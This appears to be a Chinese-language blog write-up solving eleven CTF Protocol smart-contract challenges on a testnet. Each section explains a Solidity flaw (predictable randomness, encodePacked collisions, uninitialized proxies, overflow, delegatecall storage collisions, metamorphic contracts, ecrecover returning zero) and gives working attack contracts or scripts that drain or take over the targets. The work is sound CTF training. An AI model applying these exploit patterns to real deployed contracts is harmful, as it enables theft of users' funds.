[区块链安全-CTF Protocol]区块链智能合约安全实战

  • 前言
  • 1. The Lost Kitty
  • 2. RootMe
  • 3. Trickster
  • 4. The Golden Ticket
  • 5. Smart Horrocrux
  • 6. Gas Valve
  • 7. Stonk
  • 8. Pelusa
  • 9. Hack the Mothership!
  • 10. Phoenixtto
  • 11. Metaverse Supermarket

前言

这次是尝试CTF-PROTOCOL的题目,望与诸君共勉。后面应该会参考DeFiHackLabs推出对一些列攻击的POC手写和解析,同时还要参加Hackathon。大家一起努力!

1. The Lost Kitty

题目分析:

HiddenKittyCat合约中,核心部分为:

constructor() {_owner = msg.sender;bytes32 slot = keccak256(abi.encodePacked(block.timestamp, blockhash(block.number - 69)));assembly {sstore(slot, "KittyCat!")}}

可以知道kitty存储的位置是由keccak256(abi.encodePacked(block.timestamp, blockhash(block.number - 69)));决定的。而我们则是与House合约交互,每次调用一个isKittyCatHere,生成Kitty并查找。

这个因为完全取决于block.timestamp,block.number,类似于Ethernaut里的flipflopcoin

部署后,House合约为0xD50b65d0c843E70ab06666fEA69EC87Aa34581fB

攻击合约:

pragma solidity^0.8.0;interface IHouse{function isKittyCatHere(bytes32 _slot) external;}contract KittyHacker {constructor() {}function hack(address house) public {bytes32 slot = keccak256(abi.encodePacked(block.timestamp, blockhash(block.number - 69)));IHouse(house).isKittyCatHere(slot);}}

部署后攻击合约为0x3791eeD6c8fedAf433C8ce53B8Fa69C11e0b237D发起进攻,Hash为0x6ced57a2de0f1dfe348f61b77e766d330a8c123cac2296cd61146796170940e9,攻击后已经修改成功。


2. RootMe

注意要点在于

accountByIdentifier[identifier] = msg.sender

identifier = keccak256(abi.encodePacked(user, salt));

因为abi.encodePacked解释如下:

types shorter than 32 bytes are concatenated directly, without padding or sign extension

因此,虽然在部署时ROOTROOT的输入,但ROOTROOT也能encode出同样的效果。

攻击合约如下:

pragma solidity^0.8.0;interface IRootMe{function register(string memory username, string memory salt) external;function write(bytes32 storageSlot, bytes32 data) external;}contract RootMeHacker {constructor(){}function testEncodePackedValue(string memory user, string memory salt) public pure returns (bytes memory) {bytes memory packed = abi.encodePacked(user, salt);return packed;}function attack(address target,bytes32slot, bytes32content) public{IRootMe(target).register("RO","OTROOT");IRootMe(target).write(slot,content);}}

部署合约地址为0xb92F069Aec3Ae791fA717FFC0D9FAE73039bB1a5。这里先用testEncodePackedValue测试,(ROOTROOT)的输入其实只是将值拼接0x524f4f54524f4f54R的Ascii值为82,对应Hex就是0x52

同时,我们先通过register获取权限,再通过write写入slot0000000000000000000000000000000000000000000000000000000000000000中的值为0000000000000000000000000000000000000000000000000000000000000001。(记得传参时,前面需要加上0x)。攻击后已经修改完成。


3. Trickster

进行了测试,如果直接与JackpotProxy交互,则会有来无回,为什么?

因为在JackpotProxy::constructor中,创建了_proxy,但却没有进行初始化initialize。所以在调用claimPrize时,ownermsg.sender不匹配,因此无法成行。

我们在Goerli上查看调用Tx,可以获得JackPot=0x8Aa401B931C990DCA9D4d5EAbe67217e320D731C,直接调用JackPot::initialize获得所有权。

在获取后,传入100000000000000wei,调用JackPot::claimPrize。此时,已经掏空JackPot余额。


4. The Golden Ticket

初步判断,看看是不是有溢出漏洞 waitlist[msg.sender] += uint40(_time);(unchecked)。这里遇到一个问题,remix里VM模式无论如何都无法调用joinRaffle,一直报错Not Found。但在web3 injector模式中却没问题,不知道其中原因。估计是一个Bug?

pragma solidity^0.8.0;interface IGoldenTicket{function joinWaitlist() external;function updateWaitTime(uint256) external;function joinRaffle(uint256) external;function giftTicket(address) external;function waitlist(address) external returns (uint40);}contract TheGoldenTicketHacker { constructor(){}function check(address _addr) publicreturns (bool){return (IGoldenTicket(_addr).waitlist(address(this)) < block.timestamp );}function checkTimestamp() public view returns (uint256){return block.timestamp;}function attack(address _addr,address _to) public{IGoldenTicket(_addr).joinWaitlist();IGoldenTicket(_addr).updateWaitTime(type(uint40).max- IGoldenTicket(_addr).waitlist(address(this)) + 1 days);uint256 randomNumber = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp)));IGoldenTicket(_addr).joinRaffle(randomNumber);IGoldenTicket(_addr).giftTicket(_to);}}

5. Smart Horrocrux

原来Horrocrux魂器的意思,学习到了。

切入点肯定在destroyIt里,我们对该函数的callData进行分析,假设输入spell=111,magic=3calldata如下:

0x60c4a9f1 // selector0000000000000000000000000000000000000000000000000000000000000040 // 0x0 string index0000000000000000000000000000000000000000000000000000000000000003 // 0x20 magic0000000000000000000000000000000000000000000000000000000000000003 // 0x40 string length3131310000000000000000000000000000000000000000000000000000000000 // string value
spellInBytes := mload(add(spell, 32))

以上读取的肯定是string value = 0x45746865724b6164616272610000000000000000000000000000000000000000 (ascii -> bytes) 所以value应该是EtherKadabra

而又需要 (bytes4(bytes32(uint256(spellInBytes) - magic)))恰好是kill(selector为0x41c0e1b5)(实际计算时应该是后面还需要补56个0)所以magic=1674133761342824277929123818302714816965480662716616051558525647956333297664

同时别忘了还需要将invincible设置为false。这需要合约只有1wei,只能通过自毁合约进行,所以我们也得写个合约。最后攻击合约如下:

// SPDX-License-Identifier: MITpragma solidity 0.8.17;interface ISmartHorrocrux {function destroyIt(string memory,uint256) external;function setInvincible() external;}contract Bomb {constructor() {}fallback() external payable {}function destroy(address victim) public{selfdestruct(payable(victim));}}contract SmartHorrocruxHacker {ISmartHorrocrux victim;constructor(address target) payable{victim = ISmartHorrocrux(target);}function attack(string memory spell, uint256 magic) public{Bomb bomb = new Bomb();payable(address(bomb)).transfer(1);payable(address(victim)).call("");bomb.destroy(address(victim));victim.setInvincible();victim.destroyIt(spell,magic);}}

此时gas要给高一点,不然会出现outOfGas。

PS: Remix体验简直是糟糕!浪费我很多时间!


6. Gas Valve

这一题要注意:model no. EIP-150,有解释如下:使用ADD这样的简单操作相对于复杂计算操作,例如用SHA256加密一个特定的数字,会消耗较少的gas。攻击者通过在他的交易合同中不断的使用某些特定的opcodes使得整个交易变得计算复杂却在网络上消耗极少的费用。

问题在这里

try nozzle.insert() returns (bool result) {lastResult = result;return result;} catch {lastResult = false;return false;}

当抛出异常才会认为失败,否则即使result=false也会直接返回。

其实思路很简单,如何消耗完所有的gas呢?尝试循环调用直到达到最大深度,结果失败(抛出了异常)。查看Gas Refund可以看到,selfdestruct会立马触发gasRefund,而不会抛出异常。

攻击合约如下:

// SPDX-License-Identifier: MITpragma solidity 0.8.17;contract ValveHacker {constructor() {}function insert() public returns (bool result) {selfdestruct(payable(msg.sender));}}

7. Stonk

问题在于:

require(amountGMEin / ORACLE_TSLA_GME == amountTSLAout, "Invalid price");

因为solidity中没有小数,所以会导致会有整除为0的情况,即1/2=0,也就是将GME换成TSLA时,可以小额兑换,实际什么也拿不到。

一开始,想用合约去攻击,后来发现写死有msg.sender,所以只能用js去写了。

const abi = ["function buyTSLA(uint256 amountGMEin, uint256 amountTSLAout)","function sellTSLA(uint256 amountTSLAin, uint256 amountGMEout)"];const addressStonk = '0x1552F5d5e9d31E51a412a8E5DA2b8F27040Dfb3a';const contract= new ethers.Contract(addressStonk, abi, provider);console.log(contract);async function attack(){const tx1 = await contract.connect(hacker).sellTSLA(20,1000);await tx1.wait();console.log(tx1);for (i = 0 ;i < 50; i++){await contract.connect(hacker).buyTSLA(40,0);}}attack();

PS : Gas 杀手!


8. Pelusa

有一点限制 require(msg.sender.code.length == 0, "Only EOA players");且还要实现IGamehandOfGod()函数。这就表明要在创建过程code.length=0时调用passTheBall。且还要通过delegateCall修改第二个槽上的变量。

这里好像遇到一个大坑!在remix中,不同区块下blockhash结果似乎不一样?仔细研究了一下:

所述block.number状态变量允许获得所述当前块的高度。当矿工获得执行合约代码的交易时,block.number该交易的未来区块的 的 是已知的,因此合约可以可靠地访问其价值。但是,在 EVM 中执行交易的那一刻,由于显而易见的原因,正在创建的区块的区块哈希尚不可知,并且 EVM 将始终产生零。

所以:

value = address(uint160(uint256(keccak256(abi.encodePacked(msg.sender, blockhash(block.number))))));value2 = address(uint160(uint256(keccak256(abi.encodePacked(msg.sender, bytes32(0))))));

以上两者的结果就是相等的!

所以攻击合约如下:

// SPDX-License-Identifier: MITpragma solidity 0.8.17;contract PelusaHacker {Exploit public exp;constructor() {}function attack(address target, address sender) public{while (true) {exp = new Exploit(target);if (uint256(uint160(address(exp))) % 100 == 10){break;}}exp.setParam(sender);exp.attack();}}contract Exploit {address publicfakeOwner;uint256 private shot = 0;address private target;constructor(address _target){target = _target;if (uint256(uint160(address(this))) % 100 == 10){IPelusa(target).passTheBall();}}function setParam(address sender) public {fakeOwner =address(uint160(uint256(keccak256(abi.encodePacked(msg.sender, bytes32(0))))));}function getBallPossesion() public view returns (address){return fakeOwner;}function handOfGod() public returns (uint256){shot = shot + 1;return 22061986;}function attack() public {IPelusa(target).shoot();}}interface IPelusa{function passTheBall() external;function shoot() external;}

攻击时,我们应该找到sender:"0xaa758e00eca745cab9232b207874999f55481951"

记得把gas拉高一点。结果在测试网上似乎还有问题,再跑一遍又好了!


9. Hack the Mothership!

问题出现在:

(bool success,) = module.delegatecall(msg.data);

modulespaceship又出现了slot collision

我们想要 hacked = true;,就需要满足leader == msg.sender,所以需要

promoteToLeader(address _leader),这里就需要满足:

The proposed leader is a spaceship captain=> assignNewCaptainToShip(address _newCaptain) mothership=> askForNewCaptain(address _newCaptain) spaceship=> _isCrewMember(address)=> isLeaderApproved(address) => OK

所以我们的思路:

  1. 对于spaceship,将其captain置0,将自己加入fleetaskForNewCaptain
  2. addModule修改LeaderShip指向合约,直接通过
  3. promoteToLeader

因为都要通过,所以spaceshipcaptain都要修改。

攻击合约如下:

// SPDX-License-Identifier: MITpragma solidity 0.8.17;contract ShipHacker {IMotherShip public ship;FakeCaptain public captain;ISpaceShip public spaceship;constructor(address target) {ship = IMotherShip(target);}function fleet(uint256 x)public{ship.fleet(x);}function attack() public{for (uint i = 0; i < 5; i++){spaceship = ISpaceShip(ship.fleet(i));captain = new FakeCaptain();spaceship.replaceCleaningCompany(address(0));spaceship.addAlternativeRefuelStationsCodes(uint256(uint160((address(captain)))));captain.attack(address(spaceship));}ship.promoteToLeader(address(captain));captain.hack(address(ship));}}contract FakeCaptain {constructor() {}function hack(address _ship) external {IMotherShip(_ship).hack();}function attack(address _spaceship) public {ISpaceShip(_spaceship).askForNewCaptain(address(this));ISpaceShip(_spaceship).addModule(ISpaceShip.isLeaderApproved.selector,address(this));}function isLeaderApproved(address) external pure {}}interface IMotherShip{function hack() external;function promoteToLeader(address _leader) external;function fleet(uint256) external returns (address);}interface ISpaceShip{function askForNewCaptain(address _newCaptain) external;function addModule(bytes4 _moduleSig, address _moduleAddress) external;function replaceCleaningCompany(address _cleaningCompany) external;function addAlternativeRefuelStationsCodes(uint256 refuelStationCode) external;function isLeaderApproved(address) external pure;}

10. Phoenixtto

assembly {x := create2(0, add(_code, 0x20), mload(_code), 0)}addr = x;

仔细观察,这个就是Metamorphic合约。

5860208158601c335a63aaf10f428752fa158151803b80938091923cf3,这串bytecode的原理是staticcall调用getImplementation方法,获取implementation合约地址,再用extcodecopy把implementation合约的runtime bytecode复制到memory,做为当前部署合约的runtime bytecode,以此来动态替换合约的runtime bytecode,而合约地址又不变。

所以,我们先自毁合约(手动),然后修改逻辑合约(通过攻击合约完成)即可!

通过`capture`手动销毁

攻击合约:

// SPDX-License-Identifier: MITpragma solidity 0.8.17;contract PhoenixttoHacker {constructor(){}function attack(address _target) public{ILab(_target).reBorn(type(Phoenixtto2).creationCode);}fallback() external payable {}}contract Phoenixtto2 {address public owner;bool private _isBorn;function reBorn() external {if (_isBorn) return;_isBorn = true;owner = PLAYER_ADDRESS;}function capture(string memory _newOwner) external {if (!_isBorn || msg.sender != tx.origin) return;address newOwner = address(uint160(uint256(keccak256(abi.encodePacked(_newOwner)))));if (newOwner == msg.sender) {owner = newOwner;} else {selfdestruct(payable(msg.sender));_isBorn = false;}}}interface ILab{function reBorn(bytes memory _code) external;}

11. Metaverse Supermarket

buyUsingOracle(OraclePrice calldata oraclePrice, Signature calldata signature)

此处oraclePrice 和 signature是分离的,只知道有签名,谁知道是不是对此签名呢?问题在于

ecrecover could return address(0) in case of an error!

而我们有没有对Oracle做初始化!所以recovered == oracle天然是成立的,我们可以随意填写。

攻击合约

// SPDX-License-Identifier: MITpragma solidity 0.8.17;struct OraclePrice {uint256 blockNumber;uint256 price;}struct Signature {uint8 v;bytes32 r;bytes32 s;}contract InflatStoreHacker {constructor() {}function attack(address store) public{OraclePrice memory price = OraclePrice(block.number,0);Signature memory sig = Signature(27, 0, 0);IInflaStore s = IInflaStore(store);IMeal meal = IMeal(s.meal());for (uint i = 0; i< 10; i++){s.buyUsingOracle(price,sig);meal.transferFrom(address(this),0x4fd74AF56b8843b07A30DE799174AEc8ad8DF577,i);}}function onERC721Received(address,address,uint256,bytes calldata) external virtual returns (bytes4) {return InflatStoreHacker.onERC721Received.selector;}}interface IInflaStore{function meal() external returns (address);function buyUsingOracle(OraclePrice calldata oraclePrice, Signature calldata signature) external;}interface IMeal {function transferFrom(address,address,uint256) external;}

挑战完成!